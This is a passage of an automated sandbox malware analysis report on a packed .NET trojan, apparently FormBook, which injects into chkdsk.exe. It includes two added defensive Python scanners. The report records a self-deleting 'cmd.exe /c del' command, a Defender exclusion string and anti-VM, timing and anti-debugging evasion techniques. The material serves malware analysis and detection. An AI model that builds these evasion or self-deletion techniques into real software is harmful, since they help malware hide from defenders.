Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345190906.00000000005F2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.349469695.0000000007000000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000003.00000000.341708297.0000000000DE2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.416179493.00000000019CF000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415711074.0000000001696000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe Binary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
Source: GV8EJooYMIgEnEk.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: GV8EJooYMIgEnEk.exe Virustotal: Detection: 60%
Source: GV8EJooYMIgEnEk.exe Metadefender: Detection: 20%
Source: GV8EJooYMIgEnEk.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe File read: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe:Zone.Identifier
Source: GV8EJooYMIgEnEk.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GV8EJooYMIgEnEk.exe.log
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@7/5
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: GV8EJooYMIgEnEk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: GV8EJooYMIgEnEk.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: GV8EJooYMIgEnEk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe

Data Obfuscation

Source: GV8EJooYMIgEnEk.exe, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.3.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.2.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.5.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.0.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.9.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.7.unpack, i8/By.cs .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_07164FF9 push es; retf 0_2_0716500D
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 0_2_0716C325 push FFFFFF8Bh; iretd 0_2_0716C327
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041B822 push eax; ret 3_2_0041B828
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041B82B push eax; ret 3_2_0041B892
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041B88C push eax; ret 3_2_0041B892
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00419178 push ebp; iretd 3_2_0041917B
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041A10B push edi; retf 3_2_0041A10C
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041A2A7 push ebx; retf 3_2_0041A2AA
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00415C52 pushad ; ret 3_2_00415C5A
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041CCCE push es; iretd 3_2_0041CCD0
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041B7D5 push eax; ret 3_2_0041B828
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DDD0D1 push ecx; ret 10_2_04DDD0E4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AACCCE push es; iretd 10_2_04AACCD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA5C52 pushad ; ret 10_2_04AA5C5A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAB7D5 push eax; ret 10_2_04AAB828
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAB88C push eax; ret 10_2_04AAB892
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAB82B push eax; ret 10_2_04AAB892
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAB822 push eax; ret 10_2_04AAB828
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAA10B push edi; retf 10_2_04AAA10C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA9178 push ebp; iretd 10_2_04AA917B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AAA2A7 push ebx; retf 10_2_04AAA2AA
Source: initial sample Static PE information: section name: .text entropy: 7.78260076892
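The "push x; ret/retf/iretd" rows above, the back-to-back RDTSC pairs under Malware Analysis System Evasion, and the fs:[00000030h] PEB reads under Anti Debugging are all findings that a byte-pattern scan over a dumped code region reproduces, and the .text entropy of 7.78 is the usual packed-section tell. The scanner below is an added example (not Joe Sandbox's or FormBook's code): it computes entropy, finds the three obfuscated-branch idioms, pairs RDTSC instructions within a short window, and for each fs:[30h] read looks ahead for an access to PEB.BeingDebugged (+2) or PEB.NtGlobalFlag (+0x68), which is what separates a debugger check from ordinary PEB bookkeeping. The input buffer is constructed for the example; the opcode encodings are the standard 32-bit x86 ones. Two caveats a reader of this report should keep in mind: pattern matching without a disassembler also hits by coincidence inside packed data (a 7.78-entropy .text is exactly that), so the 3_2_/10_2_ addresses above, which are runtime (stage 2) memory, are the regions worth scanning, not the on-disk section; and most of the chkdsk.exe fs:[30h] reads listed later sit at 0x04D8xxxx-0x04E5xxxx, above the 0x04D60000 region the PDB rows tag with wntdll.pdb, so reading them as a mapped copy of ntdll doing its normal PEB accesses is a plausible inference, not something the report states.

```python
"""Static heuristics for the code-level findings in this report: .text entropy,
push/ret-style obfuscated branches, back-to-back RDTSC timing checks, and
fs:[30h] PEB reads that go on to touch BeingDebugged or NtGlobalFlag.
Added example; not Joe Sandbox or FormBook code."""
import math
import re
from collections import Counter

PUSH_OPCODES = {0x06: "push es", 0x50: "push eax", 0x53: "push ebx",
                0x55: "push ebp", 0x57: "push edi", 0x60: "pushad"}
TERMINATORS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}
RDTSC = re.compile(rb"\x0f\x31")
# mov eax, fs:[30h] = 64 A1 30 00 00 00 ; mov ecx, fs:[30h] = 64 8B 0D 30 00 00 00
PEB_READ = re.compile(rb"\x64(?:\xa1|\x8b\x0d)\x30\x00\x00\x00")


def _peb_field_patterns(base: int) -> dict:
    """Follow-on accesses through the PEB pointer; base is the ModRM byte for
    [eax+disp8] (0x40) or [ecx+disp8] (0x41)."""
    r = bytes([base])
    return {
        b"\x0f\xb6" + r + b"\x02": "BeingDebugged",                   # movzx eax, byte [reg+2]
        b"\x80" + bytes([base + 0x38]) + b"\x02\x00": "BeingDebugged",  # cmp byte [reg+2], 0
        b"\x8b" + r + b"\x68": "NtGlobalFlag",                        # mov eax, [reg+68h]
        b"\xf6" + r + b"\x68\x70": "NtGlobalFlag",                    # test byte [reg+68h], 70h
    }


PEB_FIELDS = {"eax": _peb_field_patterns(0x40), "ecx": _peb_field_patterns(0x41)}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 .. 8.0; the report's .text scores 7.78."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def find_push_ret(code: bytes) -> list:
    """(offset, text) for 'push reg/seg; ret|retf|iretd' and 'push imm8; ret|retf|iretd'."""
    hits, i = [], 0
    while i < len(code) - 1:
        b = code[i]
        if b in PUSH_OPCODES and code[i + 1] in TERMINATORS:
            hits.append((i, f"{PUSH_OPCODES[b]}; {TERMINATORS[code[i + 1]]}"))
            i += 2
        elif b == 0x6A and i + 2 < len(code) and code[i + 2] in TERMINATORS:
            imm = code[i + 1] - 0x100 if code[i + 1] >= 0x80 else code[i + 1]  # sign-extended imm8
            hits.append((i, f"push {imm & 0xFFFFFFFF:08X}h; {TERMINATORS[code[i + 2]]}"))
            i += 3
        else:
            i += 1
    return hits


def find_rdtsc_pairs(code: bytes, max_gap: int = 16) -> list:
    """(first, second) offsets of two RDTSC instructions within max_gap bytes,
    the shape of the 'RDTSC instruction interceptor' rows (gap of 6 bytes)."""
    offs = [m.start() for m in RDTSC.finditer(code)]
    return [(a, b) for a, b in zip(offs, offs[1:]) if b - a <= max_gap]


def find_peb_reads(code: bytes, window: int = 12) -> list:
    """(offset, reg, field) for each fs:[30h] read; field is the debugger-related
    PEB member accessed within `window` bytes, or None for ordinary PEB use."""
    out = []
    for m in PEB_READ.finditer(code):
        reg = "eax" if code[m.start() + 1] == 0xA1 else "ecx"
        tail = code[m.end(): m.end() + window]
        field = next((name for pat, name in PEB_FIELDS[reg].items() if pat in tail), None)
        out.append((m.start(), reg, field))
    return out


def triage(code: bytes, entropy_threshold: float = 7.0) -> dict:
    ent = shannon_entropy(code)
    return {
        "entropy": round(ent, 2),
        "likely_packed": ent >= entropy_threshold,
        "push_ret": find_push_ret(code),
        "rdtsc_pairs": find_rdtsc_pairs(code),
        "peb_reads": find_peb_reads(code),
    }


# Constructed buffer for the example (not bytes from the sample): idioms glued together.
SAMPLE = (
    b"\x55\x8b\xec"                       # push ebp; mov ebp, esp   (plain prologue)
    b"\x50\xc3"                           # push eax; ret            (obfuscated jump)
    b"\x6a\x8b\xcf"                       # push FFFFFF8Bh; iretd    (cf. 0_2_0716C325)
    b"\x06\xcb"                           # push es; retf
    b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"   # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    b"\x64\xa1\x30\x00\x00\x00"           # mov eax, fs:[30h]
    b"\x0f\xb6\x40\x02"                   # movzx eax, byte [eax+2]  -> BeingDebugged
    b"\x64\x8b\x0d\x30\x00\x00\x00"       # mov ecx, fs:[30h]
    b"\x8b\x41\x18"                       # mov eax, [ecx+18h]       -> ProcessHeap, benign
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Run it against a region carved from a stage-2 memory dump (the 3_2_ and 10_2_ images) rather than the packed on-disk .text; the entropy score is the one place the on-disk file is the right input.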

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\chkdsk.exe Process created: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (37 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GV8EJooYMIgEnEk.exe PID: 6024, type: MEMORYSTR
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000004A98604 second address: 0000000004A9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000004A9899E second address: 0000000004A989A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 4632 Thread sleep time: -35216s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 5632 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 5248 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_004088D0 rdtsc 3_2_004088D0
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe API coverage: 9.5 %
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread delayed: delay time: 35216 Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000000.384317833.00000000047D0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATA
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
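Two things in the rows above are easy to misread. First, the VMware device strings attributed to explorer.exe (Prod_VMware_SATA, the SCSI\CdRom&Ven_NECVMWar paths, SCSI\Disk&Ven_VMware) are PnP device identifiers the sandbox's VMware guest exposes to every process; they show where the analysis ran, not that the sample looked for them. The sample's own anti-VM evidence is the set of strings dumped from GV8EJooYMIgEnEk.exe memory: SBIEDLL.DLL (Sandboxie), kernel32.dll!wine_get_unix_file_name (Wine), the VMware Tools install path and the SOFTWARE\VMware, Inc.\VMware Tools key. The "VMware SVGA II" row also carries an Add-MpPreference -ExclusionPath fragment, which is the Defender exclusion cmdlet; the report shows only the string, not a PowerShell process running it. Second, the sleep value -922337203685477 is 2^63 100-nanosecond units divided by 10000, i.e. the largest relative delay a 64-bit NT timeout can express: a thread parked forever rather than a long sleep. The parser below is an added example (not Joe Sandbox code) that applies both rules to report rows; it assumes the numbers in "Thread sleep time" are milliseconds despite the "s" suffix (the -30000 threshold then matches the customary 30 s sandbox limit), and the input rows are copied from this report with the dump identifiers abridged.

```python
"""Triage of Joe Sandbox evasion rows (added example, not Joe Sandbox code).
Attributes each 'Binary or memory string' to the process it was dumped from,
so VMware device names in explorer.exe's own memory are separated from
VM/sandbox markers found in the sample's memory, and decodes the sleep
values, including the 2^63-tick 'infinite' one."""
import re

# Markers seen in this report; compared case-insensitively.
MARKERS = {"SBIEDLL.DLL": "Sandboxie", "WINE_GET_UNIX_FILE_NAME": "Wine",
           "VMWARE": "VMware"}

STRING_RE = re.compile(r"^Source: ([^,\s]+).*?Binary or memory string: (.*)$")
SLEEP_RE = re.compile(r"^Source: (\S+) TID: (\d+) Thread sleep time: (-?\d+)s >= (-?\d+)s")

TICKS_PER_MS = 10_000   # NT relative delays are counted in 100-ns units
MAX_TICKS = 2 ** 63     # magnitude of the largest signed 64-bit delay


def classify_delay(value: int, threshold: int) -> str:
    """Assumption: report values are milliseconds despite the 's' suffix.
    922337203685477 ms * 10000 rounds to 2^63 ticks: a sleep that never returns."""
    ms = abs(value)
    if ms * TICKS_PER_MS >= MAX_TICKS - TICKS_PER_MS:
        return "infinite"
    return "long" if ms >= abs(threshold) else "short"


def parse_evasion_rows(text: str, sample: str) -> dict:
    """sample: image name of the submitted file; strings from any other
    process are bucketed as host noise, not as the sample's VM checks."""
    res = {"anti_vm": [], "host_noise": [], "delays": []}
    for line in text.splitlines():
        m = SLEEP_RE.match(line)
        if m:
            proc = re.split(r"[\\/]", m.group(1))[-1]
            res["delays"].append((proc, int(m.group(2)),
                                  classify_delay(int(m.group(3)), int(m.group(4)))))
            continue
        m = STRING_RE.match(line)
        if not m:
            continue
        proc, s = m.group(1), m.group(2).strip()
        for marker, what in MARKERS.items():
            if marker in s.upper():
                bucket = "anti_vm" if proc == sample else "host_noise"
                res[bucket].append((proc, what, s))
                break
    return res


# Rows copied from this report (dump identifiers abridged).
ROWS = """\
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.sdmp Binary or memory string: SBIEDLL.DLL
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: explorer.exe, 00000005.00000000.384317833.sdmp Binary or memory string: Prod_VMware_SATA
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.sdmp Binary or memory string: InstallPathJC:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\
Source: C:\\Users\\user\\Desktop\\GV8EJooYMIgEnEk.exe TID: 4632 Thread sleep time: -35216s >= -30000s Jump to behavior
Source: C:\\Users\\user\\Desktop\\GV8EJooYMIgEnEk.exe TID: 5632 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\\Windows\\explorer.exe TID: 5248 Thread sleep time: -30000s >= -30000s Jump to behavior
"""

if __name__ == "__main__":
    for key, value in parse_evasion_rows(ROWS, "GV8EJooYMIgEnEk.exe").items():
        print(key, value)
```

Feed it the whole text report: only rows whose Source is the submitted image count as the sample's VM checks, and an "infinite" delay in the sample (TID 5632 here) is the thread that was parked to wait out the analysis, which is the one to wake or patch when re-running the sample under a debugger.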

Anti Debugging

Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_004088D0 rdtsc 3_2_004088D0
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h] 10_2_04E06CF0 (3 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E414FB mov eax, dword ptr fs:[00000030h] 10_2_04E414FB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58CD6 mov eax, dword ptr fs:[00000030h] 10_2_04E58CD6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9849B mov eax, dword ptr fs:[00000030h] 10_2_04D9849B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBA44B mov eax, dword ptr fs:[00000030h] 10_2_04DBA44B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1C450 mov eax, dword ptr fs:[00000030h] 10_2_04E1C450 (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA746D mov eax, dword ptr fs:[00000030h] 10_2_04DA746D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] 10_2_04E41C06 (14 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h] 10_2_04E5740D (3 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h] 10_2_04E06C0A (4 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBBC2C mov eax, dword ptr fs:[00000030h] 10_2_04DBBC2C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h] 10_2_04E4FDE2 (4 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E38DF1 mov eax, dword ptr fs:[00000030h] 10_2_04E38DF1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h] 10_2_04E06DC9 (3 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06DC9 mov ecx, dword ptr fs:[00000030h] 10_2_04E06DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h] 10_2_04E06DC9 (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9D5E0 mov eax, dword ptr fs:[00000030h] 10_2_04D9D5E0 (2 occurrences)
